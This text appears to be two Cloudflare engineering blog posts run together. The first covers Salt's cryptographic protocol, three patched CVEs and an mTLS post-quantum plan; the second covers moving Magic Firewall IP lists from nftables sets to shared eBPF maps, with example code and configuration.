At Cloudflare, we are preparing the Internet and our infrastructure for the arrival of quantum computers. A sufficiently large and stable quantum computer will easily break commonly deployed cryptography such as RSA. Luckily there is a solution: we can swap out the vulnerable algorithms with so-called post-quantum algorithms that are believed to be secure even against quantum computers. For a particular system, this means that we first need to figure out which cryptography is used, for what purpose, and under which (performance) constraints. Most systems use the TLS protocol in a standard way, and there a post-quantum upgrade is routine. However, some systems such as SaltStack, the focus of this blog post, are more interesting. This blog post chronicles our path of making SaltStack quantum-secure, so welcome to this adventure: this secret extra post-quantum blog post!

SaltStack, or simply Salt, is an open-source infrastructure management tool used by many organizations. At Cloudflare, we rely on Salt for provisioning and automation, and it has allowed us to grow our infrastructure quickly.

Salt uses a bespoke cryptographic protocol to secure its communication. Thus, the first step to a post-quantum Salt was to examine what the protocol was actually doing. In the process we discovered a number of security vulnerabilities (CVE-2022-22934, CVE-2022-22935, CVE-2022-22936). This blog post chronicles the investigation, our findings, and how we are helping secure Salt now and in the quantum future.

Cryptography in Salt

Let’s start with a high-level overview of Salt.

The main agents in a Salt system are servers and clients (referred to as masters and minions in the Salt documentation). A server is the central control point for a number of clients, which can be in the tens of thousands: it can issue a command to the entire fleet, provision client machines with different characteristics, collect reports on jobs running on each machine, and much more. Depending on the architecture, there can be multiple servers managing the same fleet of clients. This is what makes Salt great, as it helps the management of complex infrastructure.

By default, the communication between a server and a client happens over ZeroMQ on top of TCP though there is an experimental option to switch to a custom transport directly on TCP. The cryptographic protocol is largely the same for both transports. The experimental TCP transport has an option to enable TLS which does not replace the custom protocol but wraps it in server-authenticated TLS. More about that later on.

The custom protocol relies on a setup phase in which each server and each client has its own long-term RSA-2048 keypair. On the surface similar to TLS, Salt defines a handshake, or key exchange protocol, that generates a shared secret, and a record protocol which uses this secret with symmetric encryption (the symmetric channel).

Key exchange protocol

In its basic form, the key exchange (or handshake) protocol is an RSA key exchange in which the server chooses the secret and encrypts it to the client’s public key. The exact form of the protocol then depends on whether either party already knows the other party’s long-term public key, since certificates (like in TLS) are not used. By default, clients trust the server’s public key on first use, and servers only trust the client’s public key after it has been accepted by an out-of-band mechanism. The shared secret is shared among the entire fleet of clients, so it is not specific to a particular server and client pair. This allows the server to encrypt a broadcast message only once. We will come back to this performance trade-off later on.

[Figure: Salt key exchange (as of version 3004) under default settings, showing the first connection between the given server and client.]
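
To make the shape of this handshake concrete, here is a minimal sketch in Go of the general pattern described above: the server picks a fresh symmetric secret and encrypts it to the client’s RSA public key, and the client recovers it with its private key. This is an illustration of the pattern only, not Salt’s implementation; Salt’s padding, serialization, and key handling differ, and the names below are made up.

package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

func main() {
	// The client's long-term RSA-2048 keypair; the server only trusts the
	// public half after out-of-band acceptance, as described above.
	clientKey, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}

	// Server side: choose the shared secret and encrypt it to the client's
	// public key. (In Salt, the same fleet-wide secret would be encrypted
	// to each client in turn.)
	sharedSecret := make([]byte, 24) // e.g. an AES-192 key
	if _, err := rand.Read(sharedSecret); err != nil {
		panic(err)
	}
	ciphertext, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, &clientKey.PublicKey, sharedSecret, nil)
	if err != nil {
		panic(err)
	}

	// Client side: recover the secret with the long-term private key.
	recovered, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, clientKey, ciphertext, nil)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered a %d-byte shared secret\n", len(recovered))
}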

Symmetric channel

The shared secret is used as the key for encryption. Most of the messages between a server and a client are secured in an Encrypt-then-MAC fashion, using AES-192 in CBC mode for encryption and HMAC-SHA256 for authentication. For certain more sensitive messages, variations on this protocol are used to add more security. For example, commands are signed using the server’s long-term secret key, and “pillar data” (deemed more sensitive) is encrypted only to a particular client using a freshly generated secret key.

[Figure: Symmetric channel in Salt (as of version 3004).]
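
As an illustration of the Encrypt-then-MAC construction described above, here is a rough Go sketch: AES-192 in CBC mode for encryption, followed by an HMAC-SHA256 tag over the IV and ciphertext. The key split, padding, and framing are simplified for clarity and do not mirror Salt’s wire format; the function name is made up.

package example

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
)

// encryptThenMAC returns IV || ciphertext || HMAC-SHA256(IV || ciphertext).
// encKey must be 24 bytes (AES-192); macKey is a separate HMAC key.
func encryptThenMAC(encKey, macKey, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return nil, err
	}

	// PKCS#7-style padding so the message fills whole 16-byte blocks.
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := make([]byte, len(plaintext)+pad)
	copy(padded, plaintext)
	for i := len(plaintext); i < len(padded); i++ {
		padded[i] = byte(pad)
	}

	// Fresh random IV for CBC, sent along with the ciphertext.
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)

	// Encrypt-then-MAC: authenticate the IV and ciphertext, not the plaintext.
	mac := hmac.New(sha256.New, macKey)
	mac.Write(iv)
	mac.Write(ct)

	out := append(iv, ct...)
	return append(out, mac.Sum(nil)...), nil
}

On the receiving end, the tag must be checked (for example with hmac.Equal) before any decryption is attempted; verifying first is what gives Encrypt-then-MAC its robustness.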

Security vulnerabilities

We found that the protocol variation used for pillar messages contains a flaw. As shown in the diagram below, a monster-in-the-middle attacker (MitM) that sits between a server and a client can substitute arbitrary “pillar data” served to the client. It needs to know the client’s public key, but that is easy to find since clients broadcast it as part of their key exchange request. The initial key exchange can be observed, or one can be triggered on demand using a specially crafted message. This MitM was possible because neither the newly generated key nor the actual payload was authenticated as coming from the server. This matters because “pillar data” can include anything from specifying packages to be installed to credentials and cryptographic keys. Thus, this flaw could allow an attacker to gain access to a vulnerable client machine.

[Figure: Illustration of the monster-in-the-middle attack, CVE-2022-22934.]

We reported the issue to Salt on November 5, 2021, and it was assigned CVE-2022-22934. Earlier this week, on March 28, 2022, Salt released a patch that adds a server signature to the pillar message to prevent the attack.

We found several other, smaller issues. Messages could be replayed to the same or a different client. This could allow a file intended for one client to be served to a different one, perhaps aiding lateral movement. This is CVE-2022-22936 and has been patched by adding the name of the addressed client, a nonce, and a signature to messages.

Finally, there were some messages that could be manipulated to cause the client to crash. This is CVE-2022-22935 and was patched similarly by adding the addressee, a nonce, and a signature.

If you are running Salt, please update as soon as possible to 3002.8, 3003.4, or 3004.1.

Moving forward

These patches add signatures to almost every single message. The decision to have a single shared secret was a performance trade-off: only a single encryption is required to broadcast a message. As signatures are computationally much more expensive than symmetric encryption, this trade-off didn’t work out that well. It’s better to switch to a separate shared key per client, so that we don’t need to add a signature on every separate message. In effect, we are creating a single long-lived mutually-authenticated channel per client. But then we are getting very close to what mutually authenticated TLS (mTLS) can provide. What would that look like? Hold that thought for a moment: we will return to it below.

We got sidetracked from our original question: what does this all mean for making Salt post-quantum secure? One thing to know about post-quantum cryptography today is that signatures are much larger: Dilithium2, for instance, weighs in at 2.4 kB compared to 256 bytes for an RSA-2048 signature. So, ironically, patching these vulnerabilities has made our job more difficult, as there are now many more signatures. Thus, for our post-quantum goal too, mTLS seems very attractive, not least because there are post-quantum TLS stacks ready to go.

Finally, as the security properties of mTLS are well understood, it will be much easier to add new messages and functionality to Salt’s protocol. With the current complex protocol, any change is much harder to judge with confidence.

An mTLS-based transport

So what would such an mTLS-based protocol for Salt look like? Clients would pin the server certificate, and the server would pin the client certificates. Thus, we wouldn’t have any traditional public key infrastructure (PKI). This matches up nicely with how Salt deals with keys today. It allows clients to establish long-lived connections with their server and be sure that all data exchanged between them is confidential, mutually authenticated, and forward secret. This mitigates replays, swapping of messages, reflection attacks, and subtle denial-of-service pathways for free.
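
To sketch what that trust model could look like, here is a hedged Go example of a client-side TLS configuration that pins a single expected server certificate instead of consulting a CA; the server side would perform the analogous check against its set of accepted client certificates. This illustrates certificate pinning in general and is not necessarily the design Salt will adopt; the function name and package layout are made up.

package example

import (
	"bytes"
	"crypto/tls"
	"crypto/x509"
	"errors"
)

// pinnedClientConfig builds a TLS config that presents our client certificate
// and accepts exactly one server certificate, pinned by its raw DER bytes.
func pinnedClientConfig(clientCert tls.Certificate, pinnedServerCert []byte) *tls.Config {
	return &tls.Config{
		Certificates: []tls.Certificate{clientCert},
		// No CA hierarchy: skip the default chain verification and replace
		// it with an exact match against the pinned certificate.
		InsecureSkipVerify: true,
		VerifyPeerCertificate: func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
			for _, raw := range rawCerts {
				if bytes.Equal(raw, pinnedServerCert) {
					return nil
				}
			}
			return errors.New("server certificate does not match the pinned certificate")
		},
		MinVersion: tls.VersionTLS13,
	}
}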

We tested this idea by implementing a third transport using WebSocket over mTLS (WSS). As mentioned before, Salt already offers an option to use TLS with the TCP transport, but it doesn’t authenticate clients and creates a new TCP connection for every client request, which leads to a multitude of unnecessary TLS handshakes. Internally, Salt has been architected to work with new connections for each request, so our proof of concept required some laborious retooling.
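
For a sense of what the client side of such a transport could look like, the sketch below (assuming the github.com/gorilla/websocket package, a pinned TLS configuration like the one above, and a hypothetical server address) dials a long-lived WebSocket over mutually authenticated TLS. It is an illustration of the idea, not our proof-of-concept code.

package example

import (
	"crypto/tls"

	"github.com/gorilla/websocket"
)

// dialSaltWSS opens a long-lived WebSocket connection to the server over
// mutually authenticated TLS. tlsConf is expected to carry the client
// certificate and the pinned server certificate check.
func dialSaltWSS(tlsConf *tls.Config) (*websocket.Conn, error) {
	dialer := websocket.Dialer{TLSClientConfig: tlsConf}
	// The address and path are placeholders for illustration.
	conn, _, err := dialer.Dial("wss://salt-master.example.com:4506/ws", nil)
	if err != nil {
		return nil, err
	}
	return conn, nil
}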

Our findings are promising: at scale, there would be no significant performance losses and potentially some improvements. In our preliminary experiments with a single server handling a thousand clients, there was no difference in several metrics compared to the default ZeroMQ transport. In our experiment, resource-intensive operations such as fetching pillar and state data resulted in lower CPU usage with the mTLS transport. Enabling long-lived connections reduced the amount of data transmitted between the clients and the server, in some cases significantly so.

We have shared our preliminary results with Salt, and we are working together to add an mTLS-based transport upstream. Stay tuned!

Conclusion

We had a look at how to make Salt post-quantum secure. While doing so, we found and helped fix several issues. We see a clear path forward to a future post-quantum Salt based on mTLS. Salt is but one system: we will continue our work, checking system-by-system, collaborating with vendors to bring post-quantum into the present.

With thanks to Bas and Sofía for their help on the project.

Optimizing Magic Firewall’s IP lists

Post Syndicated from Jordan Griege original https://blog.cloudflare.com/magic-firewall-optimizing-ip-lists/

Magic Firewall is Cloudflare’s replacement for network-level firewall hardware. It evaluates gigabits of traffic every second against user-defined rules that can include millions of IP addresses. Writing a firewall rule for each IP address is cumbersome and verbose, so we have been building out support for various IP lists in Magic Firewall—essentially named groups that make the rules easier to read and write. Some users want to reject packets based on our growing threat intelligence of bad actors, while others know the exact set of IPs they want to match, which Magic Firewall supports via the same API as Cloudflare’s WAF.

With all those IPs, the system was using more of our memory budget than we’d like. To understand why, we need to first peek behind the curtain of our magic.

Life inside a network namespace

Magic Transit and Magic WAN enable Cloudflare to route layer 3 traffic, and they are the front door for Magic Firewall. We have previously written about how Magic Transit uses network namespaces to route packets and isolate customer configuration. Magic Firewall operates inside these namespaces, using nftables as the primary implementation of packet filtering.

When a user makes an API request to configure their firewall, a daemon running on every server detects the change and makes the corresponding changes to nftables. Because nftables configuration is stored within the namespace, each user’s firewall rules are isolated from the next. Every Cloudflare server routes traffic for all of our customers, so it’s important that the firewall only applies a customer’s rules to their own traffic.

Using our existing technologies, we built IP lists using nftables sets. In practice, this means that the wirefilter expression

ip.geoip.country == "US"

is implemented as

table ip mfw {
	set geoip.US {
		typeof ip saddr
		elements = { 192.0.2.0, … }
	}
	chain input {
		ip saddr @geoip.US drop
	}
}

This design for the feature made it very easy to extend our wirefilter syntax so that users could write rules using all the different IP lists we support.

Scaling to many customers

We chose this design since sets fit easily into our existing use of nftables, and we shipped quickly with just a few, relatively small lists for a handful of customers. It’s common practice for our team to enable a new feature for just a few customers at first, and this approach worked well initially. But we eventually started to observe a dramatic increase in our system’s memory use. Here’s what we observed as those customers started using IP lists:

[Figure: kernel memory use as customers started using IP lists]

It turns out you can’t store millions of IPs in the kernel without someone noticing, but the real problem is that we pay that cost for each customer that uses them. Each network namespace gets a complete copy of all the lists that its rules reference. Just to make it perfectly clear, if 10 users have a rule that uses the anonymizer list, then a server has 10 copies of that list stored in the kernel. Yikes!

And it isn’t just the storage of these IPs that causes alarm; the sheer size of the nftables configuration also causes nft (the command-line program for configuring nftables) to use quite a bit of compute power.

[Figure: CPU usage spikes coinciding with nftables updates]

Can you guess when the nftables updates take place? The CPU usage itself wasn’t particularly problematic, as the service is already quite lean. However, those spikes also create competition with other services that heavily use netlink sockets. At one point, a monitoring alert for another service started firing for high CPU, and a fellow development team went through the incident process only to realize our system was the primary contributor to the problem. They made use of the --terse flag to prevent nft from wasting precious time rendering huge lists of IPs, but degrading another team’s service was a harsh way to learn that lesson.

We put quite a bit of effort into working around this problem. We tried doing incremental updates of the sets, only adding or deleting the elements that had changed since the last update. It was sometimes helpful, but the complexity ended up not being worth the small savings. Through a lot of profiling, we found that splitting an update across multiple statements improved the situation somewhat. This means we changed

add element ip mfw set0 { 192.0.2.0, 192.0.2.2, …, 198.51.100.0, 198.51.100.2, … }

to

add element ip mfw set0 { 192.0.2.0, … }
add element ip mfw set0 { 198.51.100.0, … }

just to squeeze out a second or two of the time nft took to process our configuration. We were spending a fair number of development cycles looking for optimizations, and we needed to find a way to turn the tide.

One more step with eBPF

As we mentioned on our blog recently, Magic Firewall leverages eBPF for some advanced packet matching. It may not be a big surprise that eBPF can match an IP against a list, but it wasn’t a tool we thought to reach for a year ago. What makes eBPF relevant to this problem is that eBPF maps exist independently of network namespaces. That’s right: eBPF gives us a way to share this data across all the network namespaces we create for our customers.

Since several of our IP lists contain ranges, we can’t use a simple BPF_MAP_TYPE_HASH or BPF_MAP_TYPE_ARRAY to perform a lookup. Fortunately, Linux already has a data structure that we can use to accommodate ranges: the BPF_MAP_TYPE_LPM_TRIE.

Given an IP address, the trie’s implementation of bpf_map_lookup_elem() will return a non-null result if the IP falls within any of the ranges already inserted into the map. And using the map is about as simple as it gets for eBPF programs. Here’s an example:

#include <linux/bpf.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>

/* Key layout expected by BPF_MAP_TYPE_LPM_TRIE: a prefix length followed by
 * the address bytes in network order. */
typedef struct {
	__u32 prefix_len;
	__u8 ip[4];
} trie_key_t;

SEC("maps")
struct bpf_map_def ip_list = {
	.type = BPF_MAP_TYPE_LPM_TRIE,
	.key_size = sizeof(trie_key_t),
	.value_size = 1,
	.max_entries = 1,
	.map_flags = BPF_F_NO_PREALLOC,
};

SEC("socket/saddr_in_list")
int saddr_in_list(struct __sk_buff *skb) {
	struct iphdr iph;
	trie_key_t trie_key;

	/* Read the IPv4 header from the start of the packet. */
	bpf_skb_load_bytes(skb, 0, &iph, sizeof(iph));

	/* Look up the full /32 source address; the trie matches it against any
	 * range previously inserted into the map. */
	trie_key.prefix_len = 32;
	trie_key.ip[0] = iph.saddr & 0xff;
	trie_key.ip[1] = (iph.saddr >> 8) & 0xff;
	trie_key.ip[2] = (iph.saddr >> 16) & 0xff;
	trie_key.ip[3] = (iph.saddr >> 24) & 0xff;

	/* A non-null lookup result means the source address is in the list. */
	void *val = bpf_map_lookup_elem(&ip_list, &trie_key);
	return val == NULL ? BPF_OK : BPF_DROP;
}
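
The ranges themselves have to be inserted into the trie from user space. As a hedged sketch of what that could look like, the Go snippet below uses the github.com/cilium/ebpf library to open a pinned map and insert a couple of CIDR ranges; the pin path and the placeholder value are made up, and this illustrates the LPM-trie key layout rather than our daemon’s actual code.

package main

import (
	"log"
	"net"

	"github.com/cilium/ebpf"
)

// trieKey mirrors the kernel's struct bpf_lpm_trie_key: a 32-bit prefix
// length followed by the address bytes in network order (8 bytes total,
// matching key_size in the program above).
type trieKey struct {
	PrefixLen uint32
	Addr      [4]byte
}

func main() {
	// Hypothetical pin path; the map just has to be pinned somewhere both
	// the loader and the firewall daemon can reach.
	m, err := ebpf.LoadPinnedMap("/sys/fs/bpf/ip_list", nil)
	if err != nil {
		log.Fatal(err)
	}
	defer m.Close()

	for _, cidr := range []string{"192.0.2.0/24", "198.51.100.0/24"} {
		_, ipnet, err := net.ParseCIDR(cidr)
		if err != nil {
			log.Fatal(err)
		}
		ones, _ := ipnet.Mask.Size()
		key := trieKey{PrefixLen: uint32(ones)}
		copy(key.Addr[:], ipnet.IP.To4())
		// The value is a single placeholder byte; only membership matters.
		if err := m.Put(key, uint8(1)); err != nil {
			log.Fatal(err)
		}
	}
}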

nftables befriends eBPF

One of the limitations of our prior work incorporating eBPF into the firewall involves how the program is loaded into the nftables ruleset. Because the nft command-line program does not support calling a BPF program from a rule, we formatted the Netlink messages ourselves. While this allowed us to insert a rule that executes an eBPF program, it came at the cost of losing out on atomic rule replacements.

So any native nftables rules could be applied in one transaction, but any eBPF-based rules would have to be inserted afterwards. This introduces some headaches for handling failures—if inserting an eBPF rule fails, should we simply retry, or perhaps roll back the nftables ruleset as well? And what if those follow-up operations fail?

In other words, we went from a relatively simple operation—the new firewall configuration either fully applied or didn’t—to a much more complex one. We didn’t want to keep using more and more eBPF without solving this problem. After hacking on the nftables repo for a few days, we came out with a patch that adds a BPF keyword to the nftables configuration syntax.

I won’t cover all the changes, which we hope to upstream soon, but there were two key parts. The first is implementing struct expr_ops and the required methods, which is how nft’s parser knows what to do with each keyword in its configuration language (like the “bpf” keyword we introduced). The second is a different approach to what we had solved previously: instead of directly formatting struct xt_bpf_info_v1 into a byte array as iptables does, nftables uses the nftnl library to create the netlink messages.

Once we had found our footing in a foreign codebase, the code turned out to be fairly simple.

static void netlink_gen_bpf(struct netlink_linearize_ctx *ctx,
                            const struct expr *expr,
                            enum nft_registers dreg)
{
       struct nftnl_expr *nle;

       nle = alloc_nft_expr("match");
       nftnl_expr_set_str(nle, NFTNL_EXPR_MT_NAME, "bpf");
       nftnl_expr_set_u8(nle, NFTNL_EXPR_MT_REV, 1);
       nftnl_expr_set(nle, NFTNL_EXPR_MT_INFO, expr->bpf.info, sizeof(struct xt_bpf_info_v1));
       nft_rule_add_expr(ctx, nle, &expr->location);
}

With the patch finally built, it became possible for us to write configuration like this, where we can provide a path to any pinned eBPF program.

# nft -f - <<EOF
table ip mfw {
  chain input {
    bpf pinned "/sys/fs/bpf/filter" drop
  }
}
EOF

And now we can mix native nftables matches with eBPF programs without giving up the atomic nature of nft commands. This unlocks the opportunity for us to build even more advanced packet inspection and protocol detection in eBPF.

Results

This plot shows kernel memory use during the deployment; the change was rolled out to each namespace over a few hours.

[Figure: kernel memory during the deployment]

At this point, though, we’ve merely moved the memory out of that kernel slab. Fortunately, the eBPF map memory now appears in the cgroup for our Golang process, so it’s relatively easy to report. Here’s the point at which we first started populating the maps:

[Figure: eBPF map memory as reported in the Golang process’s cgroup]

This change was pushed a couple of weeks before the maps were actually used in the firewall (i.e. the graph just above). The map memory has remained constant ever since: unlike with our original design, the number of customers is no longer a predominant factor in this feature’s resource usage. The new model makes us more confident about how the service will behave as our product continues to grow.

Besides being better positioned to use eBPF more in the future, we made a significant improvement to the efficiency of the product today. In any project that grows rapidly for a while, an engineer can often see a few pesky pitfalls looming on the horizon. It is very satisfying to dive deep into these technologies and come out with a creative, novel solution before experiencing too much pain. We love solving hard problems and improving our systems to handle rapid growth, in addition to pushing lots of new features.

Does that sound like an environment you want to work in? Consider applying!